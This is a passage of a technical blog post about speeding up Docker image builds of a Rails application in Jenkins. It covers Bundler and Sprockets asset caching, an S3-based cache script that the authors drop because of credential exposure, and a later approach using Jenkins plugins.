Therefore, when aKubernetes pod is created using such a Docker image, Kubernetes pulls the image,starts a Docker container using that image inside the pod and runs <code>puma</code> serverimmediately.</p><p>The base Docker image which we use in the <code>FROM</code> instruction contains necessarysystem packages. We rarely need to update any system package. Therefore, anintermediate layer which may have been built previously for that instruction isreused while executing the <code>docker build</code> command. If the layer for <code>FROM</code>instruction is reused, Docker reuses cached layers for the next two instructionssuch as <code>ENV</code> and <code>WORKDIR</code> respectively since both of them are never changed.</p><pre><code class="language-bash">01:05:53 Step 1/8 : FROM bigbinary/xyz-base:latest01:05:53 latest: Pulling from bigbinary/xyz-base01:05:53 Digest: sha256:193951cad605d23e38a6016e07c5d4461b742eb2a89a69b614310ebc898796f001:05:53 Status: Image is up to date for bigbinary/xyz-base:latest01:05:53  ---&gt; c2ab738db40501:05:53 Step 2/8 : ENV APP_PATH /data/app/01:05:53  ---&gt; Using cache01:05:53  ---&gt; 5733bc978f1901:05:53 Step 3/8 : WORKDIR $APP_PATH01:05:53  ---&gt; Using cache01:05:53  ---&gt; 0e5fbc868af8</code></pre><p>Docker checks contents of the files in the image and calculates checksum foreach file for an <code>ADD</code> instruction. Since source code changes often, thepreviously cached layer for the <code>ADD</code> instruction is invalidated due to themismatching checksums. Therefore, the 4th instruction <code>ADD</code> in our Dockerfilehas to add the local files in the provided build context to the filesystem ofthe image being built in a separate intermediate container instead of reusingthe previously cached instruction layer. On an average, this instruction spendsabout 25 seconds.</p><pre><code class="language-bash">01:05:53 Step 4/8 : ADD . 
$APP_PATH01:06:12  ---&gt; cbb9a6ac297e01:06:17 Removing intermediate container 99ca98218d99</code></pre><p>We need to build Docker images for our application using different Railsenvironments. To achieve that, we trigger a<a href="https://wiki.jenkins.io/display/JENKINS/Parameterized+Build">parameterized Jenkins build</a>by specifying the needed Rails environment parameter. This parameter is thenpassed to the <code>docker build</code> command using <code>--build-arg RAILS_ENV=production</code>option. The <code>ARG</code> instruction in the Dockerfile defines <code>RAILS_ENV</code> variable andis implicitly used as an environment variable by the rest of the instructionsdefined just after that <code>ARG</code> instruction. Even if the previous <code>ADD</code>instruction didn't invalidate build cache; if the <code>ARG</code> variable is differentfrom a previous build, then a &quot;cache miss&quot; occurs and the build cache isinvalidated for the subsequent instructions.</p><pre><code class="language-bash">01:06:17 Step 5/8 : ARG RAILS_ENV01:06:17  ---&gt; Running in b793b8cc2fe701:06:22  ---&gt; b8a70589e38401:06:24 Removing intermediate container b793b8cc2fe7</code></pre><p>The next two <code>RUN</code> instructions are used to install gems and precompile staticassets using sprockets. As earlier instruction(s) already invalidates the buildcache, these <code>RUN</code> instructions are mostly executed instead of reusing cachedlayer. 
The <code>bundle install</code> command takes about 2.5 minutes and the <code>rake assets:precompile</code> task takes about 4.35 minutes.</p><pre><code class="language-bash">01:06:24 Step 6/8 : RUN bin/bundle install --without development test
01:06:24  ---&gt; Running in a556c7ca842a
01:06:25 bin/bundle install --without development test
01:08:22  ---&gt; 82ab04f1ff42
01:08:40 Removing intermediate container a556c7ca842a
01:08:58 Step 7/8 : RUN bin/rake assets:precompile
01:08:58  ---&gt; Running in b345c73a22c
01:08:58 bin/bundle exec rake assets:precompile
01:09:07 ** Invoke assets:precompile (first_time)
01:09:07 ** Invoke assets:environment (first_time)
01:09:07 ** Execute assets:environment
01:09:07 ** Invoke environment (first_time)
01:09:07 ** Execute environment
01:09:12 ** Execute assets:precompile
01:13:20  ---&gt; 57bf04f3c111
01:13:23 Removing intermediate container b345c73a22c</code></pre><p>Both of the above <code>RUN</code> instructions clearly looked like the main culprits that were slowing down the whole <code>docker build</code> command and thus the Jenkins build.</p><p>The final instruction <code>CMD</code> which starts the <code>puma</code> server takes another 10
After building the Docker image, the <code>docker push</code> command spendsanother minute.</p><pre><code class="language-bash">01:13:23 Step 8/8 : CMD [&quot;bin/bundle&quot;, &quot;exec&quot;, &quot;puma&quot;]01:13:23  ---&gt; Running in 104967ad155301:13:31  ---&gt; 35d2259cdb1d01:13:34 Removing intermediate container 104967ad155301:13:34 [0mSuccessfully built 35d2259cdb1d01:13:35 [docker-builder] $ docker inspect 35d2259cdb1d01:13:35 [docker-builder] $ docker push bigbinary/xyz:production-role-management-feature-152943692901:13:35 The push refers to a repository [docker.io/bigbinary/xyz]01:14:21 d67854546d53: Pushed01:14:22 production-role-management-feature-1529436929: digest: sha256:07f86cfd58fac412a38908d7a7b7d0773c6a2980092df416502d7a5c051910b3 size: 410601:14:22 Finished: SUCCESS</code></pre><p>So, we found the exact commands which were causing the <code>docker build</code> command totake so much time to build a Docker image.</p><p>Let's summarize the steps involved in building our Docker image and the averagetime each needed to finish.</p><table><thead><tr><th>Command or Instruction</th><th>Average Time Spent</th></tr></thead><tbody><tr><td>Shallow clone of Git Repository by Jenkins</td><td>20 Seconds</td></tr><tr><td>Invocation of <code>docker build</code> by Jenkins and sending build context to Docker daemon</td><td>10 Seconds</td></tr><tr><td><code>FROM bigbinary/xyz-base:latest</code></td><td>0 Seconds</td></tr><tr><td><code>ENV APP_PATH /data/app/</code></td><td>0 Seconds</td></tr><tr><td><code>WORKDIR $APP_PATH</code></td><td>0 Seconds</td></tr><tr><td><code>ADD . 
$APP_PATH</code></td><td>25 Seconds</td></tr><tr><td><code>ARG RAILS_ENV</code></td><td>7 Seconds</td></tr><tr><td><code>RUN bin/bundle install --without development test</code></td><td>2.5 Minutes</td></tr><tr><td><code>RUN bin/rake assets:precompile</code></td><td>4.35 Minutes</td></tr><tr><td><code>CMD [&quot;bin/bundle&quot;, &quot;exec&quot;, &quot;puma&quot;]</code></td><td>1.15 Minutes</td></tr><tr><td><strong>Total</strong></td><td><strong>9 Minutes</strong></td></tr></tbody></table><p>Often, people build Docker images from a single Git branch, like <code>master</code>. Since changes in a single branch are incremental and the <code>Gemfile.lock</code> file hardly differs across commits, the bundler cache need not be managed explicitly. Instead, Docker automatically reuses the previously built layer for the <code>RUN bundle install</code> instruction if the <code>Gemfile.lock</code> file remains unchanged.</p><p>In our case, this does not happen. For every new feature or bug fix, we create a separate Git branch. To verify the changes on a particular branch, we deploy a separate review app which serves the code from that branch. To achieve this workflow, every day we need to build a lot of Docker images containing source code from varying Git branches as well as with varying environments. Most of the time, the <code>Gemfile.lock</code> and assets have different versions across these Git branches. Therefore, it is hard for Docker to cache layers for the <code>bundle install</code> and <code>rake assets:precompile</code> tasks and reuse those layers during every <code>docker build</code> command run with different application source code and a different environment. This is why the previously built Docker layer for the <code>RUN bin/bundle install</code> instruction and the <code>RUN bin/rake assets:precompile</code> instruction was often not being used in our case. 
This was causing the <code>RUN</code> instructions to be executed without reusing the previously built Docker layer cache in every other Docker build.</p><p>Before discussing the approaches to speed up our Docker build flow, let's familiarize ourselves with the <code>bundle install</code> and <code>rake assets:precompile</code> tasks and how to speed them up by reusing the cache.</p><h2>Speeding up &quot;bundle install&quot; by using cache</h2><p>By default, Bundler installs gems at the location which is set by Rubygems. Also, Bundler looks up the installed gems at the same location.</p><p>This location can be explicitly changed by using the <code>--path</code> option.</p><p>If <code>Gemfile.lock</code> does not exist, or no gem is found at the explicitly provided location or at the default gem path, then the <code>bundle install</code> command fetches all remote sources, resolves dependencies if needed and installs the required gems as per the <code>Gemfile</code>.</p><p>The <code>bundle install --path=vendor/cache</code> command would install the gems at the <code>vendor/cache</code> location in the current directory. If the same command is run without making any change to the <code>Gemfile</code>, since the gems were already installed and cached in <code>vendor/cache</code>, the command will finish instantly because Bundler need not fetch any new gems.</p><p>The tree structure of the <code>vendor/cache</code> directory looks like this.</p><pre><code class="language-tree">vendor/cache
  aasm-4.12.3.gem
  actioncable-5.1.4.gem
  activerecord-5.1.4.gem
  [...]
  ruby
    2.4.0
      bin
        aws.rb
        dotenv
        erubis
        [...]
      build_info
        nokogiri-1.8.1.info
      bundler
        gems
          activeadmin-043ba0c93408
          [...]
      cache
        aasm-4.12.3.gem
        actioncable-5.1.4.gem
        [...]
        bundler
          git
      specifications
        aasm-4.12.3.gemspec
        actioncable-5.1.4.gemspec
        activerecord-5.1.4.gemspec
        [...]
  [...]
[...]</code></pre><p>It appears that Bundler keeps two separate copies of the <code>.gem</code> files at two different locations, <code>vendor/cache</code> and <code>vendor/cache/ruby/VERSION_HERE/cache</code>.</p><p>Therefore, even if we remove a gem from the <code>Gemfile</code>, that gem will be removed only from the <code>vendor/cache</code> directory. The <code>vendor/cache/ruby/VERSION_HERE/cache</code> directory will still have the cached <code>.gem</code> file for that removed gem.</p><p>Let's see an example.</p><p>We have the <code>'aws-sdk', '2.11.88'</code> gem in our Gemfile and that gem is installed.</p><pre><code class="language-bash">$ ls vendor/cache/aws-sdk-*
vendor/cache/aws-sdk-2.11.88.gem
vendor/cache/aws-sdk-core-2.11.88.gem
vendor/cache/aws-sdk-resources-2.11.88.gem

$ ls vendor/cache/ruby/2.4.0/cache/aws-sdk-*
vendor/cache/ruby/2.4.0/cache/aws-sdk-2.11.88.gem
vendor/cache/ruby/2.4.0/cache/aws-sdk-core-2.11.88.gem
vendor/cache/ruby/2.4.0/cache/aws-sdk-resources-2.11.88.gem</code></pre><p>Now, we will remove the <code>aws-sdk</code> gem from the Gemfile and run <code>bundle install</code>.</p><pre><code class="language-bash">$ bundle install --path=vendor/cache
Using rake 12.3.0
Using aasm 4.12.3
[...]
Updating files in vendor/cache
Removing outdated .gem files from vendor/cache
  * aws-sdk-2.11.88.gem
  * jmespath-1.3.1.gem
  * aws-sdk-resources-2.11.88.gem
  * aws-sdk-core-2.11.88.gem
  * aws-sigv4-1.0.2.gem
Bundled gems are installed into `./vendor/cache`

$ ls vendor/cache/aws-sdk-*
no matches found: vendor/cache/aws-sdk-*

$ ls vendor/cache/ruby/2.4.0/cache/aws-sdk-*
vendor/cache/ruby/2.4.0/cache/aws-sdk-2.11.88.gem
vendor/cache/ruby/2.4.0/cache/aws-sdk-core-2.11.88.gem
vendor/cache/ruby/2.4.0/cache/aws-sdk-resources-2.11.88.gem</code></pre><p>We can see that the cached version of the gem(s) remained unaffected.</p><p>If we add the same gem <code>'aws-sdk', '2.11.88'</code> back to the Gemfile and perform <code>bundle install</code>, instead of fetching that gem from the remote Gem
repository, Bundler will install that gem from the cache.</p><pre><code class="language-bash">$ bundle install --path=vendor/cache
Resolving dependencies........
[...]
Using aws-sdk 2.11.88
[...]
Updating files in vendor/cache
  * aws-sigv4-1.0.3.gem
  * jmespath-1.4.0.gem
  * aws-sdk-core-2.11.88.gem
  * aws-sdk-resources-2.11.88.gem
  * aws-sdk-2.11.88.gem

$ ls vendor/cache/aws-sdk-*
vendor/cache/aws-sdk-2.11.88.gem
vendor/cache/aws-sdk-core-2.11.88.gem
vendor/cache/aws-sdk-resources-2.11.88.gem</code></pre><p>What we understand from this is that if we can reuse the explicitly provided <code>vendor/cache</code> directory every time we need to execute the <code>bundle install</code> command, then the command will be much faster because Bundler will use gems from the local cache instead of fetching them from the Internet.</p><h2>Speeding up &quot;rake assets:precompile&quot; task by using cache</h2><p>JavaScript code written in TypeScript, Elm, JSX etc. cannot be directly served to the browser. Almost all web browsers understand JavaScript (ES5), CSS and image files. Therefore, we need to transpile, compile or convert the source asset into the formats which browsers can understand. In Rails, <a href="https://github.com/rails/sprockets">Sprockets</a> is the most widely used library for managing and compiling assets.</p><p>In the development environment, Sprockets compiles assets on-the-fly as and when needed using <code>Sprockets::Server</code>. In the production environment, the recommended approach is to pre-compile assets into a directory on disk and serve them using a web server like Nginx.</p><p>Precompilation is a multi-step process for converting a source asset file into a static and optimized form using components such as processors, transformers, compressors, directives, environments, a manifest and pipelines, with the help of various gems such as <code>sass-rails</code>, <code>execjs</code>, etc. 
The assets need to be precompiled in production so that Sprockets need not resolve the inter-dependencies between the required source dependencies every time a static asset is requested. To understand how Sprockets works in great detail, please read <a href="https://github.com/rails/sprockets/blob/0cb3314368f9f9e84343ebedcc09c7137e920bc4/guides/how_sprockets_works.md#sprockets">this guide</a>.</p><p>When we compile source assets using the <code>rake assets:precompile</code> task, we can find the compiled assets in the <code>public/assets</code> directory inside our Rails application.</p><pre><code class="language-bash">$ ls public/assets
manifest-15adda275d6505e4010b95819cf61eb3.json
icons-6250335393ad03df1c67eafe138ab488.eot
icons-6250335393ad03df1c67eafe138ab488.eot.gz
icons-b341bf083c32f9e244d0dea28a763a63.svg
icons-b341bf083c32f9e244d0dea28a763a63.svg.gz
application-8988c56131fcecaf914b22f54359bf20.js
application-8988c56131fcecaf914b22f54359bf20.js.gz
xlsx.full.min-feaaf61b9d67aea9f122309f4e78d5a5.js
xlsx.full.min-feaaf61b9d67aea9f122309f4e78d5a5.js.gz
application-adc697aed7731c864bafaa3319a075b1.css
application-adc697aed7731c864bafaa3319a075b1.css.gz
FontAwesome-42b44fdc9088cae450b47f15fc34c801.otf
FontAwesome-42b44fdc9088cae450b47f15fc34c801.otf.gz
[...]</code></pre><p>We can see that each source asset has been compiled and minified, along with its gzipped version.</p><p>Note that the assets have a unique digest or fingerprint in their file names. A digest is a hash calculated by Sprockets from the contents of an asset file. If the contents of an asset change, then that asset's digest also changes. The digest is mainly used for busting the cache, so a new version of the same asset can be generated if the source file is modified or the configured cache period has expired.</p><p>The <code>rake assets:precompile</code> task also generates a manifest file along with the precompiled assets. 
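</p><p>To make this fingerprinting concrete, here is a simplified Ruby sketch of how a content-based digest produces a fingerprinted file name and a manifest-style lookup table. This is an illustration only; Sprockets' real digest computation takes more inputs into account, and the file names below are hypothetical.</p>

```ruby
require "digest"
require "json"

# Compute a digest from the asset's contents. If the contents change,
# the digest changes -- this is what busts the cache.
source = "body { color: #333; }"
digest = Digest::MD5.hexdigest(source)

# Build a fingerprinted file name for a hypothetical logical path.
logical_path  = "application.css"
fingerprinted = logical_path.sub(/(\.\w+)\z/) { |ext| "-#{digest}#{ext}" }

# A manifest-style table maps logical names to fingerprinted names,
# so lookups don't require recompiling anything.
manifest = { "assets" => { logical_path => fingerprinted } }
puts JSON.generate(manifest)

# Changing the contents yields a different digest.
new_digest = Digest::MD5.hexdigest(source + " a { color: red; }")
puts new_digest == digest # => false
```

<p>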
This manifest is used by Sprockets to perform fast lookupswithout having to actually compile our assets code.</p><p>An example manifest file, in our case<code>public/assets/manifest-15adda275d6505e4010b95819cf61eb3.json</code> looks like this.</p><pre><code class="language-json">{  &quot;files&quot;: {    &quot;application-8988c56131fcecaf914b22f54359bf20.js&quot;: {      &quot;logical_path&quot;: &quot;application.js&quot;,      &quot;mtime&quot;: &quot;2018-07-06T07:32:27+00:00&quot;,      &quot;size&quot;: 3797752,      &quot;digest&quot;: &quot;8988c56131fcecaf914b22f54359bf20&quot;    },    &quot;xlsx.full.min-feaaf61b9d67aea9f122309f4e78d5a5.js&quot;: {      &quot;logical_path&quot;: &quot;xlsx.full.min.js&quot;,      &quot;mtime&quot;: &quot;2018-07-05T22:06:17+00:00&quot;,      &quot;size&quot;: 883635,      &quot;digest&quot;: &quot;feaaf61b9d67aea9f122309f4e78d5a5&quot;    },    &quot;application-adc697aed7731c864bafaa3319a075b1.css&quot;: {      &quot;logical_path&quot;: &quot;application.css&quot;,      &quot;mtime&quot;: &quot;2018-07-06T07:33:12+00:00&quot;,      &quot;size&quot;: 242611,      &quot;digest&quot;: &quot;adc697aed7731c864bafaa3319a075b1&quot;    },    &quot;FontAwesome-42b44fdc9088cae450b47f15fc34c801.otf&quot;: {      &quot;logical_path&quot;: &quot;FontAwesome.otf&quot;,      &quot;mtime&quot;: &quot;2018-06-20T06:51:49+00:00&quot;,      &quot;size&quot;: 134808,      &quot;digest&quot;: &quot;42b44fdc9088cae450b47f15fc34c801&quot;    },    [...]  
},  &quot;assets&quot;: {    &quot;icons.eot&quot;: &quot;icons-6250335393ad03df1c67eafe138ab488.eot&quot;,    &quot;icons.svg&quot;: &quot;icons-b341bf083c32f9e244d0dea28a763a63.svg&quot;,    &quot;application.js&quot;: &quot;application-8988c56131fcecaf914b22f54359bf20.js&quot;,    &quot;xlsx.full.min.js&quot;: &quot;xlsx.full.min-feaaf61b9d67aea9f122309f4e78d5a5.js&quot;,    &quot;application.css&quot;: &quot;application-adc697aed7731c864bafaa3319a075b1.css&quot;,    &quot;FontAwesome.otf&quot;: &quot;FontAwesome-42b44fdc9088cae450b47f15fc34c801.otf&quot;,    [...]  }}</code></pre><p>Using this manifest file, Sprockets can quickly find a fingerprinted file nameusing that file's logical file name and vice versa.</p><p>Also, Sprockets generates cache in binary format at <code>tmp/cache/assets</code> in theRails application's folder for the specified Rails environment. Following is anexample tree structure of the <code>tmp/cache/assets</code> directory automaticallygenerated after executing <code>RAILS_ENV=environment_here rake assets:precompile</code>command for each Rails environment.</p><pre><code class="language-tree">$ cd tmp/cache/assets &amp;&amp; tree. demo  sass   7de35a15a8ab2f7e131a9a9b42f922a69327805d    application.css.sassc    bootstrap.css.sassc   [...]  sprockets      002a592d665d92efe998c44adc041bd3      7dd8829031d3067dcf26ffc05abd2bd5      [...] production  sass   80d56752e13dda1267c19f4685546798718ad433    application.css.sassc    bootstrap.css.sassc   [...]  sprockets      143f5a036c623fa60d73a44d8e5b31e7      31ae46e77932002ed3879baa6e195507      [...] staging   sass    2101b41985597d41f1e52b280a62cd0786f2ee51     application.css.sassc     bootstrap.css.sassc    [...]   sprockets       2c154d4604d873c6b7a95db6a7d5787a       3ae685d6f922c0e3acea4bbfde7e7466       [...]</code></pre><p>Let's inspect the contents of an example cached file. 
Since the cached file isin binary form, we can forcefully see the non-visible control characters as wellas the binary content in text form using <code>cat -v</code> command.</p><pre><code class="language-bash">$ cat -v tmp/cache/assets/staging/sprockets/2c154d4604d873c6b7a95db6a7d5787a^D^H{^QI&quot;class^F:^FETI&quot;^SProcessedAsset^F;^@FI&quot;^Qlogical_path^F;^@TI&quot;^]components/Comparator.js^F;^@TI&quot;^Mpathname^F;^@TI&quot;T$root/app/assets/javascripts/components/Comparator.jsx^F;^@FI&quot;^Qcontent_type^F;^@TI&quot;^[application/javascript^F;^@TI&quot;mtime^F;^@Tl+^GM-gM-z;[I&quot;^Klength^F;^@Ti^BM-L^BI&quot;^Kdigest^F;^@TI&quot;%18138d01fe4c61bbbfeac6d856648ec9^F;^@FI&quot;^Ksource^F;^@TI&quot;^BM-L^Bvar Comparator = function (props) {  var comparatorOptions = [React.createElement(&quot;option&quot;, { key: &quot;?&quot;, value: &quot;?&quot; })];  var allComparators = props.metaData.comparators;  var fieldDataType = props.fieldDataType;  var allowedComparators = allComparators[fieldDataType] || allComparators.integer;  return React.createElement(    &quot;select&quot;,    {      id: &quot;comparator-&quot; + props.id,      disabled: props.disabled,      onChange: props.handleComparatorChange,      value: props.comparatorValue },    comparatorOptions.concat(allowedComparators.map(function (comparator, id) {      return React.createElement(        &quot;option&quot;,        { key: id, value: comparator },        comparator      );    }))  );};^F;^@TI&quot;^Vdependency_digest^F;^@TI&quot;%d6c86298311aa7996dd6b5389f45949f^F;^@FI&quot;^Srequired_paths^F;^@T[^FI&quot;T$root/app/assets/javascripts/components/Comparator.jsx^F;^@FI&quot;^Udependency_paths^F;^@T[^F{^HI&quot;   path^F;^@TI&quot;T$root/app/assets/javascripts/components/Comparator.jsx^F;^@F@^NI&quot;^^2018-07-03T22:38:31+00:00^F;^@T@^QI&quot;%51ab9ceec309501fc13051c173b0324f^F;^@FI&quot;^M_version^F;^@TI&quot;%30fd133466109a42c8cede9d119c3992^F;^@F</code></pre><p>We can see that there are some 
weird looking characters in the above filebecause it is not a regular file to be read by humans. Also, it seems to beholding some important information such as mime-type, original source code'spath, compiled source, digest, paths and digests of required dependencies, etc.Above compiled cache appears to be of the original source file located at<code>app/assets/javascripts/components/Comparator.jsx</code> having actual contents in JSXand ES6 syntax as shown below.</p><pre><code class="language-jsx">const Comparator = props =&gt; {  const comparatorOptions = [&lt;option key=&quot;?&quot; value=&quot;?&quot; /&gt;];  const allComparators = props.metaData.comparators;  const fieldDataType = props.fieldDataType;  const allowedComparators =    allComparators[fieldDataType] || allComparators.integer;  return (    &lt;select      id={`comparator-${props.id}`}      disabled={props.disabled}      onChange={props.handleComparatorChange}      value={props.comparatorValue}    &gt;      {comparatorOptions.concat(        allowedComparators.map((comparator, id) =&gt; (          &lt;option key={id} value={comparator}&gt;            {comparator}          &lt;/option&gt;        ))      )}    &lt;/select&gt;  );};</code></pre><p>If similar cache exists for a Rails environment under <code>tmp/cache/assets</code> and ifno source asset file is modified then re-running the <code>rake assets:precompile</code>task for the same environment will finish quickly. 
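</p><p>The effect of this cache can be illustrated with a toy content-addressed cache in Ruby. This is not Sprockets' actual code, just a sketch of the idea: compiled output is stored under the digest of the source, so an unchanged source is never compiled twice.</p>

```ruby
require "digest"

# A toy content-addressed compile cache (illustration only, not
# Sprockets' actual implementation). Output is stored under the
# digest of the source, so unchanged sources skip compilation.
class AssetCache
  attr_reader :compilations

  def initialize
    @store = {}
    @compilations = 0
  end

  def compile(source)
    key = Digest::MD5.hexdigest(source)
    @store[key] ||= begin
      @compilations += 1
      source.upcase # stand-in for real transpilation/minification
    end
  end
end

cache = AssetCache.new
cache.compile("alert('hi');")
cache.compile("alert('hi');")  # same content: cache hit, no recompile
puts cache.compilations        # => 1
cache.compile("alert('bye');") # changed content: new digest, recompile
puts cache.compilations        # => 2
```

<p>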
This is because Sprockets will reuse the cache and therefore will not need to resolve the inter-asset dependencies, perform conversion, etc.</p><p>Even if certain source assets are modified, Sprockets will rebuild the cache and re-generate compiled and fingerprinted assets just for the modified source assets.</p><p>Therefore, we can now understand that if we can reuse the <code>tmp/cache/assets</code> and <code>public/assets</code> directories every time we need to execute the <code>rake assets:precompile</code> task, then Sprockets will perform the precompilation much faster.</p><h2>Speeding up &quot;docker build&quot; -- first attempt</h2><p>As discussed above, we were now familiar with how to speed up the <code>bundle install</code> and <code>rake assets:precompile</code> commands individually.</p><p>We decided to use this knowledge to speed up our slow <code>docker build</code> command. Our initial thought was to mount a directory on the host Jenkins machine into the filesystem of the image being built by the <code>docker build</code> command. This mounted directory could then be used as a cache directory to persist the cache files of both the <code>bundle install</code> and <code>rake assets:precompile</code> commands run as part of the <code>docker build</code> command in each Jenkins build. Then every new build could reuse the previous build's cache and therefore could finish faster.</p><p>Unfortunately, this wasn't possible since Docker does not support it yet. Unlike the <code>docker run</code> command, we cannot mount a host directory with the <code>docker build</code> command. 
A feature request for providing a shared host machine directory path option to the <code>docker build</code> command is still <a href="https://github.com/moby/moby/issues/14080#issuecomment-119371247">open here</a>.</p><p>To reuse the cache and perform faster, we needed to carry the cache files of both the <code>bundle install</code> and <code>rake assets:precompile</code> commands between each <code>docker build</code> (and therefore, each Jenkins build). We were looking for some place which could be treated as a shared cache location and could be accessed during each build.</p><p>We decided to use Amazon's <a href="https://aws.amazon.com/s3/">S3 service</a> to solve this problem.</p><p>To upload and download files from S3, we needed to inject credentials for S3 into the build context provided to the <code>docker build</code> command.</p><p><img src="/blog_images/2018/speeding-up-docker-image-build-process-of-a-rails-application/jenkins-configuration-to-inject-s3-credentials-in-docker-build.png" alt="Screenshot of Jenkins configuration to inject S3 credentials in docker build command"></p><p>Alternatively, these S3 credentials can be provided to the <code>docker build</code> command using the <code>--build-arg</code> option as discussed earlier.</p><p>We used the <code>s3cmd</code> command-line utility to interact with the S3 service.</p><p>The following shell script, named <code>install_gems_and_precompile_assets.sh</code>, was configured to be executed using a <code>RUN</code> instruction while running the <code>docker build</code> command.</p><pre><code class="language-bash">set -ex

# Step 1.
if [ -e s3cfg ]; then mv s3cfg ~/.s3cfg; fi

bundler_cache_path=&quot;vendor/cache&quot;
assets_cache_path=&quot;tmp/assets/cache&quot;
precompiled_assets_path=&quot;public/assets&quot;
cache_archive_name=&quot;cache.tar.gz&quot;
s3_bucket_path=&quot;s3://docker-builder-bundler-and-assets-cache&quot;
s3_cache_archive_path=&quot;$s3_bucket_path/$cache_archive_name&quot;

# Step 2.
# Fetch the tarball archive containing cache and extract it.
# The &quot;tar&quot; command extracts the archive into &quot;vendor/cache&quot;,
# &quot;tmp/assets/cache&quot; and &quot;public/assets&quot;.
if s3cmd get $s3_cache_archive_path; then
  tar -xzf $cache_archive_name &amp;&amp; rm -f $cache_archive_name
fi

# Step 3.
# Install gems from &quot;vendor/cache&quot; and pack them up.
bin/bundle install --without development test --path $bundler_cache_path
bin/bundle pack --quiet

# Step 4.
# Precompile assets.
# Note that &quot;RAILS_ENV&quot; is already defined in the Dockerfile
# and will be used implicitly.
bin/rake assets:precompile

# Step 5.
# Compress the &quot;vendor/cache&quot;, &quot;tmp/assets/cache&quot;
# and &quot;public/assets&quot; directories into a tarball archive.
tar -zcf $cache_archive_name $bundler_cache_path \
                             $assets_cache_path  \
                             $precompiled_assets_path

# Step 6.
# Push the compressed archive containing the updated cache to S3.
s3cmd put $cache_archive_name $s3_cache_archive_path || true

# Step 7.
rm -f $cache_archive_name ~/.s3cfg</code></pre><p>Let's discuss the various steps annotated in the above script.</p><ol><li>The S3 credentials file injected by Jenkins into the build context needs to be placed at the <code>~/.s3cfg</code> location, so we move that credentials file accordingly.</li><li>Try to fetch the compressed tarball archive comprising directories such as <code>vendor/cache</code>, <code>tmp/assets/cache</code> and <code>public/assets</code>. 
If exists, extractthe tarball archive at respective paths and remove that tarball.</li><li>Execute the <code>bundle install</code> command which would reuse the extracted cachefrom <code>vendor/cache</code>.</li><li>Execute the <code>rake assets:precompile</code> command which would reuse the extractedcache from <code>tmp/assets/cache</code> and <code>public/assets</code>.</li><li>Compress the cache directories <code>vendor/cache</code>, <code>tmp/assets/cache</code> and<code>public/assets</code> in a tarball archive.</li><li>Upload the compressed tarball archive containing updated cache directories toS3.</li><li>Remove the compressed tarball archive and the S3 credentials file.</li></ol><p>Please note that, in our actual case we had generated different tarball archivesdepending upon the provided <code>RAILS_ENV</code> environment. For demonstration, here weuse just a single archive instead.</p><p>The <code>Dockerfile</code> needed to update to execute the<code>install_gems_and_precompile_assets.sh</code> script.</p><pre><code class="language-dockerfile">FROM bigbinary/xyz-base:latestENV APP_PATH /data/app/WORKDIR $APP_PATHADD . $APP_PATHARG RAILS_ENVRUN install_gems_and_precompile_assets.shCMD [&quot;bin/bundle&quot;, &quot;exec&quot;, &quot;puma&quot;]</code></pre><p>With this setup, average time of the Jenkins builds was now reduced to about 5minutes. This was a great achievement for us.</p><p>We reviewed this approach in a great detail. We found that although the approachwas working fine, there was a major security flaw. It is not at all recommendedto inject confidential information such as login credentials, private keys, etc.as part of the build context or using build arguments while building a Dockerimage using <code>docker build</code> command. And we were actually injecting S3credentials into the Docker image. 
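Such build arguments are easy to read back from the finished image. A minimal illustration of the flaw (the base image and argument names here are hypothetical, not our actual setup):

```dockerfile
FROM debian:stable-slim

# A build argument used to carry a secret -- exactly the pattern to avoid.
ARG S3_SECRET_KEY

# The value of the ARG is recorded in the metadata of this layer.
RUN echo "$S3_SECRET_KEY" > /root/.s3cfg
```

After building with `docker build --build-arg S3_SECRET_KEY=... .`, running `docker history --no-trunc` on the resulting image prints the recorded layer commands along with the injected value.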
Such confidential credentials provided while building a Docker image can be inspected using the <code>docker history</code> command by anyone who has access to that Docker image.</p><p>For this reason, we had to abandon this approach and look for another.</p><h2>Speeding up &quot;docker build&quot; -- second attempt</h2><p>In our second attempt, we decided to execute the <code>bundle install</code> and <code>rake assets:precompile</code> commands outside the <code>docker build</code> command; that is, in the Jenkins build itself. So with the new approach, we had to first execute the <code>bundle install</code> and <code>rake assets:precompile</code> commands as part of the Jenkins build and then execute <code>docker build</code> as usual. With this approach, we could take advantage of the inter-build caching provided by Jenkins.</p><p>The prerequisite was to have all the system packages required by the gems listed in the application's Gemfile installed on the Jenkins machine. We installed all the necessary system packages on our Jenkins server.</p><p>The following screenshot highlights the things that we needed to configure in our Jenkins job to make this approach work.</p><p><img src="/blog_images/2018/speeding-up-docker-image-build-process-of-a-rails-application/jenkins-configuration-to-install-arbitrary-ruby-version-and-perform-caching.png" alt="Screenshot of Jenkins configuration highlighting installation of arbitrary Ruby version and maintaining cache and bundling gems and precompiling assets outside Docker build"></p><h4>1. Running the Jenkins build in an RVM-managed environment with the specified Ruby version</h4><p>Sometimes we need to use a different Ruby version, as specified by the <code>.ruby-version</code> file in the cloned source code of the application. By default, the <code>bundle install</code> command would install the gems for the system Ruby version available on the Jenkins machine. This was not acceptable for us. Therefore, we needed a way to execute the <code>bundle install</code> command in the Jenkins build in an isolated environment which could use the Ruby version specified in the <code>.ruby-version</code> file instead of the default system Ruby version. To address this, we used the <a href="https://wiki.jenkins.io/display/JENKINS/RVM+Plugin">RVM plugin</a> for Jenkins. The RVM plugin enabled us to run the Jenkins build in an isolated environment by using or installing the Ruby version specified in the <code>.ruby-version</code> file. The section highlighted in green in the above screenshot shows the configuration required to enable this plugin.</p><h4>2. Carrying cache files between Jenkins builds to speed up the &quot;bundle install&quot; and &quot;rake assets:precompile&quot; commands</h4><p>We used the <a href="https://wiki.jenkins.io/display/JENKINS/Job+Cacher+Plugin">Job Cacher</a> Jenkins plugin to persist and carry cache directories such as <code>vendor/cache</code>, <code>tmp/cache/assets</code> and <code>public/assets</code> between builds. At the beginning of a Jenkins build, just after cloning the source code of the application, the Job Cacher plugin restores the previously cached version of these directories into the current build. Similarly, before finishing a Jenkins build, the Job Cacher plugin copies the current version of these directories to <code>/var/lib/jenkins/jobs/docker-builder/cache</code> on the Jenkins machine, which is outside the workspace directory of the Jenkins job. The section highlighted in red in the above screenshot shows the configuration required to enable this plugin.</p><h4>3. Executing the &quot;bundle install&quot; and &quot;rake assets:precompile&quot; commands before the &quot;docker build&quot; command</h4><p>Using the &quot;Execute shell&quot; build step provided by Jenkins, we execute the <code>bundle install</code> and <code>rake assets:precompile</code> commands just before the <code>docker build</code> command invoked by the CloudBees Docker Build and Publish plugin. Since the Job Cacher plugin already restores the version of the <code>vendor/cache</code>, 